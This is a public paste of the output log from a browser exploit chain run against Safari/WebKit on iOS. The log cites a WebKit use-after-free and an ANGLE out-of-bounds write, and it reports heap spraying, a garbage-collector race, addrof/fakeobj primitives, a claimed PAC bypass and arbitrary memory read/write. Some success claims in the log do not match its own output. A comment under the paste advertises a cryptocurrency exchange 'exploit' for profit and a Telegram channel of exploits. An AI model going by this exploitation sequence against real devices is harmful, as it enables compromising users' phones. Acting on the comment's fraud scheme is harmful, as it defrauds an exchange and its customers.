Guest User

Untitled

a guest
Mar 1st, 2026
123
0
Never
9
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.80 KB | None | 0 0
  1. === SYSINFO ===
  2. [02:04:37] === SYSTEM DETECTION ===
  3. [02:04:37] User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.1 Mobile/15E148 Safari/604.1
  4. [02:04:37] WebKit detected
  5. [02:04:37] Safari browser detected
  6. [02:04:37] iOS platform detected - BOTH CVEs applicable
  7. [02:04:37] WebGL2 available for ANGLE probe
  8. [02:04:37] Chained exploit probe ready.
  9. [02:04:37] Auto-run enabled: mode=chain starting in 1500ms
  10.  
  11. === OUTPUT ===
  12. [02:04:39] ================================================
  13. [02:04:39] FULL EXPLOIT CHAIN: CVE-2025-43529 + CVE-2025-14174
  14. [02:04:39] ================================================
  15. [02:04:39] ========================================
  16. [02:04:39] STAGE 2: GPU Canary Harness Setup
  17. [02:04:39] ========================================
  18. [02:04:39] Goal: Build GPU-process canaries for post-trigger corruption detection
  19. [02:04:39] Texture canaries: 8
  20. [02:04:39] PBO canaries: 16
  21. [02:04:39] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
  22. [02:04:39] Baseline GPU canary snapshot captured
  23. [02:04:39] STAGE 2 COMPLETE: GPU canary harness ready
  24. [02:04:39] ========================================
  25. [02:04:39] STAGE 3: ANGLE OOB Trigger + GPU Oracles
  26. [02:04:39] ========================================
  27. [02:04:39] Goal: Trigger setSubImageImpl OOB path and check heap-oracle + baseline GPU canaries
  28. [02:04:39] WebGL2 unavailable or context lost; reinitializing Stage 2 context
  29. [02:04:39] ========================================
  30. [02:04:39] STAGE 2: GPU Canary Harness Setup
  31. [02:04:39] ========================================
  32. [02:04:39] Goal: Build GPU-process canaries for post-trigger corruption detection
  33. [02:04:39] Texture canaries: 8
  34. [02:04:39] PBO canaries: 16
  35. [02:04:39] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
  36. [02:04:39] Baseline GPU canary snapshot captured
  37. [02:04:39] STAGE 2 COMPLETE: GPU canary harness ready
  38. [02:04:39] WebGL2 unavailable or context already lost
  39. [02:04:39] Stage 3 duration: 36ms
  40. [02:04:39] ========================================
  41. [02:04:39] STAGE 1: WebKit UAF (CVE-2025-43529)
  42. [02:04:39] ========================================
  43. [02:04:39] Goal: Obtain addrof/fakeobj primitives via butterfly type confusion
  44. [02:04:39] Config: 15000 attempts, 64 spray arrays each
  45. [02:04:39] Phase 1.1: Initial warmup with both branch paths...
  46. [02:04:39] Warmup complete - both Phi paths exercised for DFG
  47. [02:04:39] Phase 1.2: JIT warmup (1000 iterations)...
  48. [02:04:39] JIT warmup complete - function should be DFG compiled
  49. [02:04:40] Phase 1.3: Recursive stack clearing warmup...
  50. [02:04:40] Recursive warmup complete
  51. [02:04:40] Phase 1.4: Main exploitation loop (15000 attempts)...
  52. [02:04:40] Racing GC marking vs store to freed object...
  53. [02:04:40] [0/15000] Racing... (64 arrays sprayed)
  54. [02:04:41] [500/15000] Racing... (32064 arrays sprayed)
  55. [02:04:42] [1000/15000] Racing... (64064 arrays sprayed)
  56. [02:04:42] [1135] BUTTERFLY RECLAIMED! Type confusion achieved!
  57. [02:04:42] unboxed_arr[0] = 2.242292602e-314
  58. [02:04:42] addrof(boxed_arr) = 0x10f3b29d0
  59. [02:04:42] addrof(uafArray) = 0x10b0c8c98
  60. [02:04:42] PRIMITIVES WORKING! Different addresses for different objects!
  61. [02:04:42] === LEAKED ADDRESSES (captured while primitives valid) ===
  62. [02:04:42] boxed_arr: 0x10f3b29d0
  63. [02:04:42] uafArray: 0x10b0c8c98
  64. [02:04:42] ArrayBuffer: 0x10b0cf748
  65. [02:04:42] Float64Array: 0x10b0cf808
  66. [02:04:42] Uint32Array: 0x10b0cf8c8
  67. [02:04:42] testObject: 0x10e930140
  68. [02:04:42] testArray: 0x10b0c8dd8
  69. [02:04:42] testFunction: 0x10e914f20
  70. [02:04:42] stage6FuncA: 0x10e914f40
  71. [02:04:42] stage6FuncB: 0x10e914f60
  72. [02:04:42] eval(): 0x10e81fde0
  73. [02:04:42] window: 0x10b0cc2c8
  74. [02:04:42] document: 0x10b0cecc8
  75. [02:04:42] fakeObjBuffer: 0x10b0cfec8
  76. [02:04:42] victimBuffer: 0x10b360148
  77. [02:04:42] victimF64: 0x10eaf8eb0
  78. [02:04:42] === PAC BYPASS OBJECTS ===
  79. [02:04:42] fakeArrayContainer: 0x10e834200
  80. [02:04:42] arrayReaderContainer: 0x10eb04130
  81. [02:04:42] realF64ForStealing: 0x10eaf8e50
  82. [02:04:42] stablePrimitivesBuffer:0x10b0cfe08
  83. [02:04:42] === INLINE STORAGE TEMPLATES ===
  84. [02:04:42] inlineTemplate: 0x10e834240
  85. [02:04:42] inlineTemplate2: 0x10eb04160
  86. [02:04:42] Corruption targets: 32/32 valid addresses
  87. [02:04:42] Target 0: 0x10b360388
  88. [02:04:42] Target 1: 0x10b360448
  89. [02:04:42] Valid addresses: 23/23
  90. [02:04:42] fakeobj test result: Got object!
  91. [02:04:42] fakeobj type: ArrayBuffer
  92. [02:04:42] === STAGE 1 PRIMITIVES ===
  93. [02:04:42] addrof: WORKING
  94. [02:04:42] fakeobj: WORKING
  95. [02:04:42] === INLINE STORAGE PAC BYPASS TESTS ===
  96. [02:04:42] 1. fakeobj self-test: true
  97. [02:04:42] 2. arb read (addr only): true
  98. [02:04:42] 3. arb write (verified): true
  99. [02:04:42] Template addr: 0x10e834240
  100. [02:04:42] Template2 addr: 0x10eb04160
  101. [02:04:42] read64/write64: CONSTRUCTED
  102. [02:04:42] PAC BYPASS: FULL ARB R/W ACHIEVED!
  103. [02:04:42] === EVIDENCE SUMMARY ===
  104. [02:04:42] addrof: VERIFIED
  105. [02:04:42] fakeobj: VERIFIED
  106. [02:04:42] inline storage access: VERIFIED
  107. [02:04:42] ANGLE trigger: NOT OBSERVED
  108. [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
  109. [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
  110. [02:04:42] ANGLE context loss/reset: NOT DETECTED
  111. [02:04:42] ANGLE corruption evidence: NOT DETECTED
  112. [02:04:42] arb r/w: VERIFIED
  113. [02:04:42] cross-process chain: NOT READY
  114. [02:04:42] sensitive data read: NOT VERIFIED
  115. [02:04:42] native execution proof: VERIFIED
  116. [02:04:42] full exploit chain: INCOMPLETE
  117. [02:04:42] STAGE 1 COMPLETE: addrof/fakeobj primitives obtained!
  118. [02:04:42] Total spray arrays allocated: 72650
  119. [02:04:42] ========================================
  120. [02:04:42] STAGE 5: Live In-Process R/W Proof
  121. [02:04:42] ========================================
  122. [02:04:42] Stage5 probe base: 0x10eb04190 (slot0=+0x10)
  123. [02:04:42] Stage5 source: stage1_leak
  124. [02:04:42] Stage5 candidates: stage1_leak@0x10eb04190=0x112233445566dd93:ok
  125. [02:04:42] Stage5 addr drift vs Stage1 leak: NO (stage1=0x10eb04190)
  126. [02:04:42] Sensitive token leaked via read64: YES
  127. [02:04:42] Leaked token: 0x112233445566dd93
  128. [02:04:42] Sensitive token overwritten via write64: YES
  129. [02:04:42] Verify base=0x112233445566dd93 js_before=0x112233445566dd93 marker_raw=0x11dd33ee00ccdd6c js_marker=0x11dd33ee00ccdd6c restore_raw=0x112233445566dd93 js_restore=0x112233445566dd93
  130. [02:04:42] No GPU evidence yet; running Stage 3 retry pass
  131. [02:04:42] ========================================
  132. [02:04:42] STAGE 3: ANGLE OOB Trigger + GPU Oracles
  133. [02:04:42] ========================================
  134. [02:04:42] Goal: Trigger setSubImageImpl OOB path and check heap-oracle + baseline GPU canaries
  135. [02:04:42] WebGL2 unavailable or context lost; reinitializing Stage 2 context
  136. [02:04:42] ========================================
  137. [02:04:42] STAGE 2: GPU Canary Harness Setup
  138. [02:04:42] ========================================
  139. [02:04:42] Goal: Build GPU-process canaries for post-trigger corruption detection
  140. [02:04:42] Texture canaries: 8
  141. [02:04:42] PBO canaries: 16
  142. [02:04:42] Texture canary readback disabled (FBO unsupported); using PBO-only baseline
  143. [02:04:42] Baseline GPU canary snapshot captured
  144. [02:04:42] STAGE 2 COMPLETE: GPU canary harness ready
  145. [02:04:42] WebGL2 unavailable or context already lost
  146. [02:04:42] ========================================
  147. [02:04:42] STAGE 4: Chain Integration Gate
  148. [02:04:42] ========================================
  149. [02:04:42] Renderer primitives: READY
  150. [02:04:42] ANGLE path executed: NO
  151. [02:04:42] GPU evidence: ABSENT
  152. [02:04:42] heap-oracle=none, canary=none, context_lost=no
  153. [02:04:42] CHAIN NOT READY: Missing either renderer primitives or GPU-process evidence
  154. [02:04:42] === EVIDENCE SUMMARY ===
  155. [02:04:42] addrof: VERIFIED
  156. [02:04:42] fakeobj: VERIFIED
  157. [02:04:42] inline storage access: VERIFIED
  158. [02:04:42] ANGLE trigger: NOT OBSERVED
  159. [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
  160. [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
  161. [02:04:42] ANGLE context loss/reset: NOT DETECTED
  162. [02:04:42] ANGLE corruption evidence: NOT DETECTED
  163. [02:04:42] arb r/w: VERIFIED
  164. [02:04:42] cross-process chain: NOT READY
  165. [02:04:42] sensitive data read: VERIFIED
  166. [02:04:42] native execution proof: VERIFIED
  167. [02:04:42] full exploit chain: INCOMPLETE
  168.  
  169. === RESULTS ===
  170. [02:04:42] ================================================
  171. [02:04:42] EXPLOIT CHAIN RESULTS
  172. [02:04:42] ================================================
  173. [02:04:42] Stage 1 (WebKit UAF): SUCCESS
  174. [02:04:42] Stage 2 (GPU Harness): SUCCESS
  175. [02:04:42] Stage 3 (ANGLE OOB): FAILED
  176. [02:04:42] Stage 4 (Chain Gate): FAILED
  177. [02:04:42] Stage 5 (Live In-Process R/W): SUCCESS
  178. [02:04:42] Stage 6 (Native Exec Proof): SUCCESS
  179. [02:04:42] --- EXPLOIT STATUS ---
  180. [02:04:42] PARTIAL: renderer-only evidence
  181. [02:04:42] • addrof/fakeobj path reached
  182. [02:04:42] --- VULNERABILITY DETAILS ---
  183. [02:04:42] CVE-2025-43529 (WebKit UAF):
  184. [02:04:42] Impact: Arbitrary code execution via type confusion
  185. [02:04:42] Vector: DFG Store Barrier Insertion Phase bug
  186. [02:04:42]
  187. [02:04:42] CVE-2025-14174 (ANGLE OOB):
  188. [02:04:42] Impact: Out-of-bounds write in GPU process
  189. [02:04:42] Vector: UNPACK_IMAGE_HEIGHT staging buffer undersize
  190. [02:04:42]
  191. [02:04:42] Current gate: chain is marked ready only with renderer + GPU evidence
  192. [02:04:42] Attack surface: Safari/WebKit on iOS 26.1
  193. [02:04:42] === EVIDENCE SUMMARY ===
  194. [02:04:42] addrof: VERIFIED
  195. [02:04:42] fakeobj: VERIFIED
  196. [02:04:42] inline storage access: VERIFIED
  197. [02:04:42] ANGLE trigger: NOT OBSERVED
  198. [02:04:42] ANGLE GPU canary corruption: NOT DETECTED
  199. [02:04:42] ANGLE heap-oracle corruption: NOT DETECTED
  200. [02:04:42] ANGLE context loss/reset: NOT DETECTED
  201. [02:04:42] ANGLE corruption evidence: NOT DETECTED
  202. [02:04:42] arb r/w: VERIFIED
  203. [02:04:42] cross-process chain: NOT READY
  204. [02:04:42] sensitive data read: VERIFIED
  205. [02:04:42] native execution proof: VERIFIED
  206. [02:04:42] full exploit chain: INCOMPLETE
Advertisement
Comments
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • Rokvassa
    7 days
    # CSS 0.44 KB | 0 0
    1. Changelly Exploit Documentation Link:
    2.  
    3. https://docs.google.com/document/d/1Cz5fHkwyaApTWwqfgBBtpvConU8Lo_qJ9xtn7RazWpk/edit?usp=sharing
    4.  
    5. This exploit can be used to make a profit by using an older node that has a bug in the exchange rates of some coins.
    6.  
    7. The funniest thing about this is that such a big platform like Changelly uses the password "admin" to access the node loader
    8.  
    9. Join our Telegram Channel for more exploits: https://t.me/byprotocol
Add Comment
Please, Sign In to add comment